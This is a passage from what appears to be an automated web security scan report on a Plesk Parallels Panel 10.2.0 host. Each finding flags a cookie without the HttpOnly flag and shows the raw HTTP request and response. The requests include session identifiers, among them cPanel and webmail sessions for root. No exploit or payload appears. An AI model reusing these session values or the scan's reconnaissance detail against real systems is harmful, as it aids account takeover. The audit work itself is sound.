psaContext=reseller-tools; BarExpanded=True
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:55:57 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=service-plans; path=/ Date: Sat, 24 Sep 2011 15:55:58 GMT Server: sw-cp-server Content-Length: 11535
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.49. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/upload/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/local-repository/upload/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/local-repository/upload/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:31:36 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:36 GMT Server: sw-cp-server Content-Length: 7624
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.50. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/schedule/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/schedule/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/schedule/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:31:46 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:31:46 GMT Server: sw-cp-server Content-Length: 13485
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.51. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/task@/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/backup/task@/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/backup/task@/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/backup/local-repository/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=home; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 16:05:23 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=service-plans; path=/ Date: Sat, 24 Sep 2011 16:05:24 GMT Server: sw-cp-server Content-Length: 12815
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
5.52. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/client@any/traffic/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/client@any/traffic/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=reseller-tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its